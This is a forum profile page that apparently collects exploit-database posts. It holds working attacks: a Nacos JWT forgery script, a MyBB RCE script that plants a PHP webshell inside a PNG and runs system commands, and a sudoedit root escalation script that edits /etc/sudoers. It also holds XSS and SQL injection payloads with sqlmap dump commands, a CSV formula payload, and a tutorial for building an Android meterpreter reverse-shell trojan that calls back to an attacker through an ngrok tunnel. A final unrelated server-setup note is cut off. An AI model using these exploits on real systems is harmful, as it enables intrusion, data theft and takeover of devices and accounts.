Jump to content

HireHackking

Members

  • Joined

  • Last visited

View Profile Find content

Everything posted by HireHackking

  1. HireHackking

    Nacos 2.0.3 - Access Control vulnerability

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: Nacos 2.0.3 - Access Control vulnerability # Date: 2023-01-17 # Exploit Author: Jenson Zhao # Vendor Homepage: https://nacos.io/ # Software Link: https://github.com/alibaba/nacos/releases/ # Version: Up to (including)2.0.3 # Tested on: Windows 10 # CVE : CVE-2021-43116 # Required before execution: pip install PyJWT,requests import argparse import base64 import requests import time import json from jwt.algorithms import has_crypto, requires_cryptography from jwt.utils import base64url_encode, force_bytes from jwt import PyJWS class MyPyJWS(PyJWS): def encode(self, payload, # type: Union[Dict, bytes] key, # type: str algorithm='HS256', # type: str headers=None, # type: Optional[Dict] json_encoder=None # type: Optional[Callable] ): segments = [] if algorithm is None: algorithm = 'none' if algorithm not in self._valid_algs: pass # Header header = {'alg': algorithm} if headers: self._validate_headers(headers) header.update(headers) json_header = force_bytes( json.dumps( header, separators=(',', ':'), cls=json_encoder ) ) segments.append(base64url_encode(json_header)) segments.append(base64url_encode(payload)) # Segments signing_input = b'.'.join(segments) try: alg_obj = self._algorithms[algorithm] key = alg_obj.prepare_key(key) signature = alg_obj.sign(signing_input, key) except KeyError: if not has_crypto and algorithm in requires_cryptography: raise NotImplementedError( "Algorithm '%s' could not be found. Do you have cryptography " "installed?" % algorithm ) else: raise NotImplementedError('Algorithm not supported') segments.append(base64url_encode(signature)) return b'.'.join(segments) def JwtGenerate(): Secret = 'SecretKey01234567890123456789012345678901234567890123456789012345678' payload = json.dumps( { "sub": "nacos", "exp": int(time.time()) + 3600 }, separators=(',', ':') ).encode('utf-8') encoded_jwt = MyPyJWS().encode(payload, base64.urlsafe_b64decode(Secret), algorithm='HS256') return encoded_jwt.decode() def check(url, https, token): if https: r = requests.get( url='https://' + url + '/nacos/v1/cs/configs?dataId=&group=&appName=&config_tags=&pageNo=1&pageSize=10&tenant=&search=accurate&accessToken=' + token + '&username=', verify=False) else: r = requests.get( url='http://' + url + '/nacos/v1/cs/configs?dataId=&group=&appName=&config_tags=&pageNo=1&pageSize=10&tenant=&search=accurate&accessToken=' + token + '&username=') if r.status_code == 403: print("There is no CVE-2021-43116 problem with the url!") else: print("There is CVE-2021-43116 problem with the url!") if __name__ == '__main__': parser = argparse.ArgumentParser() parser.add_argument("-t", "--target", help="URL of the target. example: 192.168.1.1:8848") parser.add_argument("-s", "--https", help="Whether https is used. Default is false") args = parser.parse_args() url = args.target https = False if (args.https): https = args.https if url: check(url, https, JwtGenerate()) else: print('Please enter URL!')
  2. HireHackking

    Zstore 6.5.4 - Reflected Cross-Site Scripting (XSS)

    HireHackking posted a blog entry in Hacker Technology
    ## Exploit Title: Zstore 6.5.4 - Reflected Cross-Site Scripting (XSS) ## Development: nu11secur1ty ## Date: 01.18.2023 ## Vendor: https://zippy.com.ua/ ## Software: https://github.com/leon-mbs/zstore/releases/tag/6.5.4 ## Reproduce: https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/zippy/zstore-6.5.4 ## Description: The value of manual insertion point 1 is copied into the HTML document as plain text between tags. The payload giflc<img src=a onerror=alert(1)>c0yu0 was submitted in the manual insertion point 1. This input was echoed unmodified in the application's response. ## STATUS: HIGH Vulnerability [+] Exploit: ```GET GET /index.php?p=App%2fPages%2fChatgiflc%3c%61%20%68%72%65%66%3d%22%68%74%74%70%73%3a%2f%2f%77%77%77%2e%6e%75%31%31%73%65%63%75%72%31%74%79%2e%63%6f%6d%2f%22%3e%3c%69%6d%67%20%73%72%63%3d%68%74%74%70%73%3a%2f%2f%6d%65%64%69%61%2e%74%65%6e%6f%72%2e%63%6f%6d%2f%2d%4b%39%73%48%78%58%41%62%2d%63%41%41%41%41%43%2f%73%68%61%6d%65%2d%6f%6e%2d%79%6f%75%2d%70%61%74%72%69%63%69%61%2e%67%69%66%22%3e%0a HTTP/2 Host: store.zippy.com.ua Cookie: PHPSESSID=f816ed0ddb0c43828cb387f992ac8521; last_chat_id=439 Cache-Control: max-age=0 Sec-Ch-Ua: "Chromium";v="107", "Not=A?Brand";v="24" Sec-Ch-Ua-Mobile: ?0 Sec-Ch-Ua-Platform: "Windows" Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.5304.107 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Sec-Fetch-Site: same-origin Sec-Fetch-Mode: navigate Sec-Fetch-User: ?1 Sec-Fetch-Dest: document Referer: https://store.zippy.com.ua/index.php?q=p:App/Pages/Main Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 ``` ## Proof and Exploit: [href](https://streamable.com/tplz84) ## Reference: [href](https://portswigger.net/web-security/cross-site-scripting/reflected) -- System Administrator - Infrastructure Engineer Penetration Testing Engineer Exploit developer at https://packetstormsecurity.com/ https://cve.mitre.org/index.html https://cxsecurity.com/ and https://www.exploit-db.com/ 0day Exploit DataBase https://0day.today/ home page: https://www.nu11secur1ty.com/ hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E= nu11secur1ty <http://nu11secur1ty.com/>
  3. HireHackking

    Chromacam 4.0.3.0 - PsyFrameGrabberService Unquoted Service Path

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: Chromacam 4.0.3.0 - PsyFrameGrabberService Unquoted Service Path # Exploit Author: Laguin Benjamin (MONK-MODE) # Discovery Date: 2023-19-01 # Vendor Homepage: https://personifyinc.com/ # Software Link: https://personifyinc.com/download/chromacam # Tested Version: Chromacam-4.0.3.0 # Vulnerability Type: Unquoted Service Path # Tested on OS: Microsoft Windows 10 x64 # CVE: In progress # Step to discover Unquoted Service Path: C:\>wmic service get name,displayname,pathname,startmode |findstr /i "auto" |findstr /i /v "c:\windows\\" |findstr /i /v """ Personify Frame Transformer PsyFrameGrabberService C:\Program Files (x86)\Personify\ChromaCam\64\PsyFrameGrabberService.exe Auto C:\>sc qc "PsyFrameGrabberService" [SC] QueryServiceConfig réussite(s) SERVICE_NAME: PsyFrameGrabberService TYPE : 110 WIN32_OWN_PROCESS (interactive) START_TYPE : 2 AUTO_START ERROR_CONTROL : 1 NORMAL BINARY_PATH_NAME : C:\Program Files (x86)\Personify\ChromaCam\64\PsyFrameGrabberService.exe LOAD_ORDER_GROUP : TAG : 0 DISPLAY_NAME : Personify Frame Transformer DEPENDENCIES : SERVICE_START_NAME : LocalSystem C:\>systeminfo Host Name: DESKTOP-1000 OS Name: Microsoft Windows 10 Professionnel OS Version: 10.0.19044 N/A build 19044 # Exploit If an attacker had already compromised the system and the current user has the privileges to write in the : C:\Program Files (x86)\ "C:\Program Files (x86)\Personify" "C:\Program Files (x86)\Personify\ChromaCam" "C:\Program Files (x86)\Personify\ChromaCam\64" folder or in "C:\" , he could place his own "Program.exe" or "PsyFrameGrabberService.exe" files respectively, and when the service starts, it would launch the malicious file, rather than the original "PsyFrameGrabberService.exe". The service starts automatically at bood and runs in system
  4. HireHackking

    MyBB 1.8.32 - Remote Code Execution (RCE) (Authenticated)

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: MyBB 1.8.32 - Chained LFI Remote Code Execution (RCE) (Authenticated) # Date: 2023-01-19 # Exploit Author: lUc1f3r11 (https://github.com/FDlucifer) # Vendor Homepage: https://mybb.com/ # Software Link: https://github.com/mybb/mybb/releases/tag/mybb_1832 # Version: MyBB 1.8.32 # Tested on: Linux # CVE : N/A # Detailed Analysis : https://fdlucifer.github.io/2023/01/17/mybb1-8-32-LFI-RCE/ # (1). An RCE can be obtained on MyBB's Admin CP in Configuration -> Profile Options -> Avatar Upload Path. to change Avatar Upload Path to /inc to bypass blacklist upload dir. # (2). after doing that, then we are able to chain in "admin avatar upload" page: http://www.mybb1832.cn/admin/index.php?module=user-users&action=edit&uid=1#tab_avatar, and LFI in "Edit Language Variables" page: http://www.mybb1832.cn/admin/index.php?module=config-languages&action=edit&lang=english. # (3). This chained bugs can lead to Authenticated RCE. # (note). The user must have rights to add or update settings and update Avatar. This is tested on MyBB 1.8.32. # # # Exp Usage: # 1.first choose a png file that size less than 1kb # 2.then merge the png file with a php simple backdoor file using the following commands # mac@xxx-2 php-backdoor % cat simple-backdoor.php # <?php # if(isset($_REQUEST['cmd'])){ # echo "<getshell success>"; # $cmd = ($_REQUEST['cmd']); # system($cmd); # echo "<getshell success>"; # phpinfo(); # } # ?> # mac@xxx-2 php-backdoor % ls # simple-backdoor.php test.png # mac@xxx-2 php-backdoor % cat simple-backdoor.php >> test.png # mac@xxx-2 php-backdoor % file test.png # test.png: PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced # 3.finnally run the following commands to run the exp script to get RCE output! enjoy the shell... # python3 exp.py --host http://www.xxx.cn --username admin --password xxx --email xxx@qq.com --file avatar_1.png --cmd "cat /etc/passwd" import requests import argparse from bs4 import BeautifulSoup from requests_toolbelt import MultipartEncoder import re r_clients = requests.Session() def exploit(username, password, email, host, file, cmd): # Adding ./inc upload path settings to bypass avatar upload path blacklists data = { "username" : username, "password" : password, "do" : "login" } login_txt = r_clients.post(host + "/admin/index.php", data=data).text if "The username and password combination you entered is invalid" in login_txt: print("[-] Login failure. Incorrect credentials supplied") exit(0) print("[+] Login successful!") if "Access Denied" in login_txt: print("[-] Supplied user doesn't have the rights to add a setting") exit(0) print("[*] Adding ./inc upload path settings...") soup = BeautifulSoup(login_txt, "lxml") my_post_key = soup.find_all("input", {"name" : "my_post_key"})[0]['value'] print("[+] my_post_key: ", my_post_key) print("[+] cookies: ", r_clients.cookies.get_dict()) cookies = r_clients.cookies.get_dict() data = { "my_post_key" : my_post_key, "gid" : 10, "upsetting[sigmycode]" : 1, "upsetting[sigcountmycode]" : 1, "upsetting[sigsmilies]" : 1, "upsetting[sightml]" : 0, "upsetting[sigimgcode]" : 1, "upsetting[maxsigimages]" : 2, "upsetting[siglength]" : 255, "upsetting[hidesignatures]" : "", "upsetting[hidewebsite]" : "", "upsetting[useravatar]" : "./inc", "upsetting[useravatardims]" : "100x100", "upsetting[useravatarrating]" : 0, "upsetting[maxavatardims]" : "100x100", "upsetting[avatarsize]" : 25, "upsetting[avatarresizing]" : "auto", "upsetting[avataruploadpath]" : "./inc", "upsetting[allowremoteavatars]" : 1, "upsetting[customtitlemaxlength]" : 40, "upsetting[allowaway]" : 1, "upsetting[allowbuddyonly]" : 0 } modify_settings_txt = r_clients.post(host + "/admin/index.php?module=config-settings&action=change",data=data,allow_redirects=False, cookies=cookies) if modify_settings_txt.status_code != 302: soup = BeautifulSoup(modify_settings_txt.text, "lxml") error_txt = soup.find_all("div", {"class" : "error"})[0].text print("[-] modify upload path failed. Reason: '{}'".format(error_txt)) exit(0) print("[+] ./inc upload path settings added!") # upload malicious avatar in admin panel with open("test.png", "rb") as f: image_binary = f.read() print("[+] read image successful! ") print("[+] image contents: ", image_binary) filename = "test.png" data1 = { 'my_post_key': my_post_key, 'username': username, 'email': email, 'avatar_upload': (filename, open(filename, 'rb'), 'image/png') } m = MultipartEncoder(data1) headers = { "User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/109.0", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8", "Accept-Language": "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2", "Accept-Encoding": "gzip, deflate", "Content-Type": m.content_type, "Origin": "null", "Connection": "close", "Upgrade-Insecure-Requests": "1" } upload_url = host + "/admin/index.php?module=user-users&action=edit&uid=1" upload = r_clients.post(upload_url, data=m, allow_redirects=False, headers=headers, cookies=cookies) if upload.status_code != 302: soup = BeautifulSoup(upload.text, "lxml") error_txt = soup.find_all("div", {"class" : "error"})[0].text print("[-] upload avatar didn't work. Reason: '{}'".format(error_txt)) exit(0) print("[+] upload malicious avatar png success!") # commands exec and get the output, we are done finally :) data2 = { 'my_post_key': my_post_key, 'file': file, 'lang': "english", 'editwith': "..", 'inadmin': 0 } exec_url = host + "/admin/index.php?module=config-languages&action=edit&cmd=" + cmd commands_exec = r_clients.post(exec_url, data=data2, cookies=cookies) if commands_exec.status_code != 200: soup = BeautifulSoup(commands_exec.text, "lxml") error_txt = soup.find_all("div", {"class" : "error"})[0].text print("[-] command exec didn't work. Reason: '{}'".format(error_txt)) exit(0) cmd_output = re.findall(r'<getshell success>(.*?)<getshell success>', commands_exec.text, re.S) print("[+] exec status: ", commands_exec.status_code) print("[+] command exec success:\n\n", cmd_output[0].replace("\n", "\n")) parser = argparse.ArgumentParser() parser.add_argument('--username', required=True, help="MyBB Admin CP username") parser.add_argument('--password', required=True, help="MyBB Admin CP password") parser.add_argument('--email', required=True, help="MyBB Admin CP admin's email (easy to find in admin users panal)") parser.add_argument('--file', required=True, help="the image file name in the server that we uploaded before. (easy to find in admin users panal)") parser.add_argument('--host', required=True, help="e.g. http://target.website.local, http://10.10.10.10, http://192.168.23.101:8000") parser.add_argument('--cmd', required=False, help="Command to run") args = parser.parse_args() username = args.username password = args.password email = args.email file = args.file host = args.host cmd = "id" if args.cmd == None else args.cmd print("""_______________________________________\n / MyBB 1.8.32 - Chained LFI Remote Code \ \n \ Execution (RCE) (Authenticated) / \n --------------------------------------- \n \ ^__^ \n \ (oo)\_______ \n (__)\ )\/\ \n ||----w | \n || || \n Author: lUc1f3r11 Github: https://github.com/FDlucifer""") exploit(username, password, email, host, file, cmd)
  5. HireHackking

    Microsoft Exchange Active Directory Topology 15.02.1118.007 - 'Service MSExchangeADTopology' Unquoted Service Path

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: Microsoft Exchange Active Directory Topology 15.02.1118.007 - 'Service MSExchangeADTopology' Unquoted Service Path # Exploit Author: Milad Karimi (Ex3ptionaL) # Exploit Date: 2023-01-18 # Vendor : Microsoft # Version : 15.02.1118.007 # Tested on OS: Microsoft Exchange Server 2019 CU12 #PoC : ============== C:\>sc qc MSExchangeADTopology [SC] QueryServiceConfig OPERAZIONI RIUSCITE NOME_SERVIZIO: MSExchangeADTopology TIPO : 10 WIN32_OWN_PROCESS TIPO_AVVIO : 2 AUTO_START CONTROLLO_ERRORE : 1 NORMAL NOME_PERCORSO_BINARIO : C:\Program Files\Microsoft\Exchange Server\V15\Bin\Microsoft.Exchange.Directory.TopologyService.exe GRUPPO_ORDINE_CARICAMENTO : TAG : 0 NOME_VISUALIZZATO : Microsoft Exchange Active Directory Topology DIPENDENZE : SERVICE_START_NAME : LocalSystem
  6. HireHackking

    SLIMSV 9.5.2 - Cross-Site Scripting (XSS)

    HireHackking posted a blog entry in Hacker Technology
    ## Exploit Title: SLIMSV 9.5.2 - Cross-Site Scripting (XSS) ## Development: nu11secur1ty ## Date: 01.19.2023 ## Vendor: https://slims.web.id/web/ ## Software: https://github.com/slims/slims9_bulian/releases/tag/v9.5.2 ## Reference: https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/slims.web.id/SLIMS-9.5.2 ## Description: The value of manual insertion `point 3` is copied into the HTML document as plain text between tags. The payload udz21<script>alert(1)</script>rk346 was submitted in manual insertion point 3. This input was echoed unmodified in the application's response. The attacker can trick the already logged-in user, to visit the exploit link that this attacker is created, and if this already logged-in user is not actually IT or admin, this will be the end of this system. ## STATUS: HIGH Vulnerability [+] Exploit: ``` GET /slims9_bulian-9.5.2/admin/modules/reporting/customs/loan_by_class.php?reportView=true&year=2002&class=%27udz21%3Ca%20href=https://www.pornhub.com%3E%3Cimg%20src=https://i.postimg.cc/1tSM7Z7F/Hijacking-clipboard.gif%22%3E%50%6c%65%61%73%65%2c%20%76%69%73%69%74%20%6f%75%72%20%6d%61%69%6e%74%65%6e%61%6e%63%65%20%70%61%67%65%20%74%6f%20%63%68%65%63%6b%20%77%68%61%74%20%69%73%20%74%68%65%20%6c%61%74%65%73%74%20%6e%65%77%73%21%20%57%65%20%61%72%65%20%73%6f%72%72%79%20%66%6f%72%20%74%68%69%73%20%70%72%6f%62%6c%65%6d%21%20%54%68%69%73%20%77%69%6c%6c%20%62%65%20%66%69%78%65%64%20%73%6f%6f%6e&membershipType=a%27%27&collType=%27 HTTP/1.1 Host: pwnedhost1.com Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.5304.107 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 Cookie: SenayanAdmin=qavdssnj7kgu5g8a7d1pm0l3rr; admin_logged_in=1; SenayanMember=8f7c68j2b0pgbovehqcfuhcnl4 Connection: close ``` ## Reproduce: [href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/slims.web.id/SLIMS-9.5.2) ## Proof and Exploit: [href](https://streamable.com/zd6e18) ## Reference: [href](https://portswigger.net/web-security/cross-site-scripting) -- System Administrator - Infrastructure Engineer Penetration Testing Engineer Exploit developer at https://packetstormsecurity.com/ https://cve.mitre.org/index.html https://cxsecurity.com/ and https://www.exploit-db.com/ 0day Exploit DataBase https://0day.today/ home page: https://www.nu11secur1ty.com/ hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E= nu11secur1ty <http://nu11secur1ty.com/>
  7. HireHackking

    Art Gallery Management System Project v1.0 - Reflected Cross-Site Scripting (XSS)

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: Art Gallery Management System Project v1.0 - Reflected Cross-Site Scripting (XSS) # Date: 20/01/2023 # Exploit Author: Rahul Patwari # Vendor Homepage: https://phpgurukul.com/ # Software Link: https://phpgurukul.com/projects/Art-Gallery-MS-PHP.zip # Version: 1.0 # Tested on: XAMPP / Windows 10 # CVE : CVE-2023-23161 # Proof of Concept: # 1- Install The application Art Gallery Management System Project v1.0 # 2- Go to https://localhost.com/Art-Gallery-MS-PHP/product.php?cid=3&&artname=prints # 3- Now Insert XSS Payload on artname parameter. the XSS Payload: %3Cimg%20src=1%20onerror=alert(document.domain)%3E # 4- Go to https://localhost.com/Art-Gallery-MS-PHP/product.php?cid=1&&artname=%3Cimg%20src=1%20onerror=alert(document.domain)%3E # 5- XSS has been triggered. # Go to this url " https://localhost.com/Art-Gallery-MS-PHP/product.php?cid=1&&artname=%3Cimg%20src=1%20onerror=alert(document.domain)%3E " XSS will trigger.
  8. HireHackking

    Art Gallery Management System Project v1.0 - SQL Injection (cid) Unauthenticated

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: Art Gallery Management System Project v1.0 - SQL Injection (cid) Unauthenticated # Date: 20/01/2023 # Exploit Author: Rahul Patwari # Vendor Homepage: https://phpgurukul.com/ # Software Link: https://phpgurukul.com/projects/Art-Gallery-MS-PHP.zip # Version: 1.0 # Tested on: XAMPP / Windows 10 # CVE : CVE-2023-23162 # Proof of Concept: # 1- Install The application Art Gallery Management System Project v1.0 # 2- Navigate to the product page by clicking on the "ART TYPE" by selecting any of the categories on the menu. # 3- Now insert a single quote ( ' ) on "cid" parameter to break the database query, you will see the output is not shown. # 4- Now inject the payload double single quote ('') in the "cid" parameter to merge the database query and after sending this request the SQL query is successfully performed and the product is shown in the output. # 5- Now find how many columns are returned by the SQL query. this query will return 6 columns. Payload:cid=1%27order%20by%206%20--%20-&artname=Sculptures # 6- for manually getting data from the database insert the below payload to see the user of the database. payload: cid=-2%27union%20select%201,2,3,user(),5,6--%20-&artname=Serigraphs # 7- for automation using "SQLMAP" intercept the request and copy this request to a file called "request.txt". # 8- now to get all database data use the below "sqlmap" command to fetch all the data. Command: sqlmap -r request.txt -p cid --dump-all --batch # Go to this url " https://localhost.com/Art-Gallery-MS-PHP/product.php?cid=-2%27union%20select%201,2,3,user(),5,6--%20-&artname=Serigraphs "
  9. HireHackking

    Title: Kali makes external network shell

    HireHackking posted a blog entry in Hacker Technology
    Configure the external network environment I am using http://www.ngrok.cc and other self-trial trials. This is free. Fill in the remote port at will (anyway, whatever you fill in will prompt that the port has been used:)) Fill in your kali ip address on the local port, which is the address of the attack machine. The port is free and you don’t understand 4444! After filling in, the effect is as follows Then click Activate Download Client Download according to your kali version Mine is 64 bit. Run client Let’s take a look at your clientid first View in Tunnel Management —— Tunnel IP, as shown in the figure After recording the id, run the following command ./sunny clientid Your id View ip on external network The IP address of the domain name we ping Get the IP address Produce an external network shell msfvenom -p android/meterpreter/reverse_tcp LHOST=External network ip LPORT=External network port R 666.apk**ps:**External network ip is the IP address of the domain name pinged just now. External network port is the port you set when adding a tunnel. After generation, configure msf msfconsole use exploit/multi/handler set payload android/meterpreter/reverse_tcp set LHOST Intranet ip set LPORT Intranet port exploit fills the pit: When generating Trojans, they use external network IP and ports. When configuring msf, we use the IP and port of the intranet (very important) After completion, the phone connects to the 4G network and runs the Trojan. Successfully obtained shell Check out the IP address of your phone [dplayer url='http://js.bbskali.cn/ji.flv' pic='http://xxx.com/xxx.jpg' autoplay='true' addition='https://api.prprpr.me/dplayer/v3/bilibili?aid=55868962'/]
  10. HireHackking

    sudo 1.8.0 to 1.9.12p1 - Privilege Escalation

    HireHackking posted a blog entry in Hacker Technology
    #!/usr/bin/env bash # Exploit Title: sudo 1.8.0 to 1.9.12p1 - Privilege Escalation # Exploit Author: n3m1.sys # CVE: CVE-2023-22809 # Date: 2023/01/21 # Vendor Homepage: https://www.sudo.ws/ # Software Link: https://www.sudo.ws/dist/sudo-1.9.12p1.tar.gz # Version: 1.8.0 to 1.9.12p1 # Tested on: Ubuntu Server 22.04 - vim 8.2.4919 - sudo 1.9.9 # # Git repository: https://github.com/n3m1dotsys/CVE-2023-22809-sudoedit-privesc # # Running this exploit on a vulnerable system allows a localiattacker to gain # a root shell on the machine. # # The exploit checks if the current user has privileges to run sudoedit or # sudo -e on a file as root. If so it will open the sudoers file for the # attacker to add a line to gain privileges on all the files and get a root # shell. if ! sudo --version | head -1 | grep -qE '(1\.8.*|1\.9\.[0-9]1?(p[1-3])?|1\.9\.12p1)$' then echo "> Currently installed sudo version is not vulnerable" exit 1 fi EXPLOITABLE=$(sudo -l | grep -E "sudoedit|sudo -e" | grep -E '\(root\)|\(ALL\)|\(ALL : ALL\)' | cut -d ')' -f 2-) if [ -z "$EXPLOITABLE" ]; then echo "> It doesn't seem that this user can run sudoedit as root" read -p "Do you want to proceed anyway? (y/N): " confirm && [[ $confirm == [yY] ]] || exit 2 else echo "> BINGO! User exploitable" echo "> Opening sudoers file, please add the following line to the file in order to do the privesc:" echo "$( whoami ) ALL=(ALL:ALL) ALL" read -n 1 -s -r -p "Press any key to continue..." EDITOR="vim -- /etc/sudoers" $EXPLOITABLE sudo su root exit 0 fi
  11. HireHackking

    Art Gallery Management System Project v1.0 - SQL Injection (editid) authenticated

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: Art Gallery Management System Project v1.0 - SQL Injection (editid) authenticated # Date: 20/01/2023 # Exploit Author: Rahul Patwari # Vendor Homepage: https://phpgurukul.com/ # Software Link: https://phpgurukul.com/projects/Art-Gallery-MS-PHP.zip # Version: 1.0 # Tested on: XAMPP / Windows 10 # CVE : CVE-2023-23163 # Proof of Concept: # 1- Install The application Art Gallery Management System Project v1.0 # 2- Navigate to admin login page and login with the valid username and password<admin:Test@123>. URL: http://localhost/Art-Gallery-MS-PHP/admin/login.php # 3- Now navigate "Manage ART TYPE" by clicking on "ART TYPE" option on left side bar. # 4- Now click on any of the Art Type "Edit" button and you will redirect to the edit page of art type. # 5- Now insert a single quote ( ' ) on "editid" parameter to break the database query, you will see the output is not shows. # 6- Now inject the payload double single quote ('') in the "editid" parameter to merge the database query and after sending this request the SQL query is successfully performed and product is shows in the output. # 7- Now find how many column are returns by the SQL query. this query will return 6 column. Payload:editid=6%27order%20by%203%20--%20- # 8- For manually get data of database insert the below payload to see the user of the database. payload: editid=-6%27union%20all%20select%201,user(),3--%20- # 9- Now to get all database data use below "sqlmap" command to fetch all the data. Command: sqlmap http://localhost/Art-Gallery-MS-PHP/admin/edit-art-type-detail.php?editid=6 --cookie="PHPSESSID=hub8pub9s5c1j18cva9594af3q" --dump-all --batch
  12. HireHackking

    ERPGo SaaS 3.9 - CSV Injection

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: ERPGo SaaS 3.9 - CSV Injection # Date: 18/01/2023 # Exploit Author: Sajibe Kanti # Vendor Name: RajodiyaInfotech # Vendor Homepage: https://rajodiya.com/ # Software Link: https://codecanyon.net/item/erpgo-saas-all-in-one-business-erp-with-project-account-hrm-crm-pos/33263426 # Version: 3.9 # Tested on: Windows & Live Litespeed Web Server # Demo Link : https://demo.rajodiya.com/erpgo-saas/login # Description # ERPGo is a software as a service (SaaS) platform that is vulnerable to CSV injection attacks. This type of attack occurs when an attacker is able to manipulate the data that is imported or exported in a CSV file, in order to execute malicious code or gain unauthorized access to sensitive information. This vulnerability can be exploited by an attacker by injecting specially crafted data into a CSV file, which is then imported into the ERPGo system. This can potentially allow the attacker to gain access to sensitive information, such as login credentials or financial data, or to execute malicious code on the system. # Proof of Concept (PoC) : Exploit # 1) Go To : https://erpgo.127.0.0.1/ERPGo/register <====| Register New account 2) Complete the Registration 3) Now Click Accounting System Then Customer 4) Now Add a New Vendors / Click Create 5) Now Add this Payload in Name : =10+20+cmd|' /C calc'!A0 6) Now Submit This Form 7) Now Download Vendors List as csv 8) Open This CSV File in excel 9) Now a Calculator will open # Image PoC : Reference Image # 1) Payload Fired: https://prnt.sc/EkKPZiMa6yz8
  13. HireHackking

    AmazCart CMS 3.4 - Cross-Site-Scripting (XSS)

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: AmazCart CMS 3.4 - Cross-Site-Scripting (XSS) # Date: 17/01/2023 # Exploit Author: Sajibe Kanti # Vendor Name: CodeThemes # Vendor Homepage: https://spondonit.com/ # Software Link: https://codecanyon.net/item/amazcart-laravel-ecommerce-system-cms/34962179 # Version: 3.4 # Tested on: Live Demo # Demo Link : https://amazy.rishfa.com/ # Description # AmazCart - Laravel Ecommerce System CMS 3.4 is vulnerable to Reflected cross-site scripting because of insufficient user-supplied data sanitization. Anyone can submit a Reflected XSS payload without login in when searching for a new product on the search bar. This makes the application reflect our payload in the frontend search ber, and it is fired everything the search history is viewed. # Proof of Concept (PoC) : Exploit # 1) Goto: https://amazy.rishfa.com/ 2) Enter the following payload in 'Search Iteam box' : "><script>alert(1)</script> 3) Now You Get a Popout as Alert 1 4) Reflected XSS payload is fired # Image PoC : Reference Image # 1) Payload Fired: https://prnt.sc/QQaiZB3tFMVB
  14. HireHackking

    SQL Monitor 12.1.31.893 - Cross-Site Scripting (XSS)

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: SQL Monitor 12.1.31.893 - Cross-Site Scripting (XSS) # Date: [12/21/2022 02:07:23 AM UTC] # Exploit Author: [geeklinuxman@gmail.com] # Vendor Homepage: [https://www.red-gate.com/] # Software Link: [https://www.red-gate.com/products/dba/sql-monitor/] # Version: [SQL Monitor 12.1.31.893] # Tested on: [Windows OS] # CVE : [CVE-2022-47870] [Description] Cross Site Scripting (XSS) in the web SQL monitor login page in Redgate SQL Monitor 12.1.31.893 allows remote attackers to inject arbitrary web Script or HTML via the returnUrl parameter. [Affected Component] affected returnUrl in https://sqlmonitor.*.com/Account/Login?returnUrl=&hasAttemptedCookie=True affected A tag under span with "redirect-timeout" id value [CVE Impact] disclosure of the user's session cookie, allowing an attacker to hijack the user's session and take over the account. [Attack Vectors] to exploit the vulnerability, someone must click on the malicious A HTML tag under span with "redirect-timeout" id value [Vendor] http://redgate.com http://sqlmonitor.com https://sqlmonitor.
  15. HireHackking

    Title: Development Notes

    HireHackking posted a blog entry in Hacker Technology
    1 Create dedicated users for PHP-FPM and Nginx groupadd www useradd -s /sbin/nologin www -g www -M-s parameter means that login is not allowed, -g parameter is assigned to www group, and -M means that user directory is not created. 2 Install php CentOS8 comes with PHP7.2 version, which is relatively new. It does not require the help of a third-party source to install it. Moreover, the PHP modules that CentOS8 come with are relatively sufficient. Use the following command to see all PHP-related packages: yum search php installation module yum -y install php php-mysqlnd php-gd php-xml php-mbstring php-ldap php-pear php-xmlrpc php-zip php-cli php-fpm php-gd php-mysqlnd php-mbstring php-opcache php-pdo php-json Configure PHP-FPM After installation, we need to configure PHP-FPM a little to make it work better with Nginx. Edit the /etc/php-fpm.d/www.conf file. There are two things to note about in this file. One of them is the user running PHP-FPM and the corresponding user group: vim /etc/php-fpm.d/www.conf user=www group=www listen=/run/php-fpm/www.sock modify the above file and change the user and group fields from apache to the www we created above. Another one is the configuration item listen=/run/php-fpm/www.sock. This line configures PHP-FPM running mode and corresponding file directory. We will use it when configuring Nginx later. start up: systemctl start php-fpm Nginx installation and configuration Installing Nginx is very simple. The CentOS8 system comes with it and only requires one line of commands to install it: yum install nginx starts: The basic configuration of systemctl start nginx is also very simple. At this point, we only need to slightly change the Nginx configuration file. The Nginx configuration file is in /etc/nginx/nginx.conf. This configuration file can configure all functions of Nginx, including other configuration files that are also loaded through this file. Open its configuration file, modify the user field, and add a few lines of configuration that may be used: vim /etc/nginx/nginx.conf user=www www; //Turn on gzip compression gzip on; //Close the display of Nginx version number server_tokens off; //Increase the maximum upload file size client_max_body_size 8M; MySQL 8 installation Install MySQL8 and corresponding tools: yum install mysql mysql-server starts MySQL server: systemctl start mysqld Initialization Command 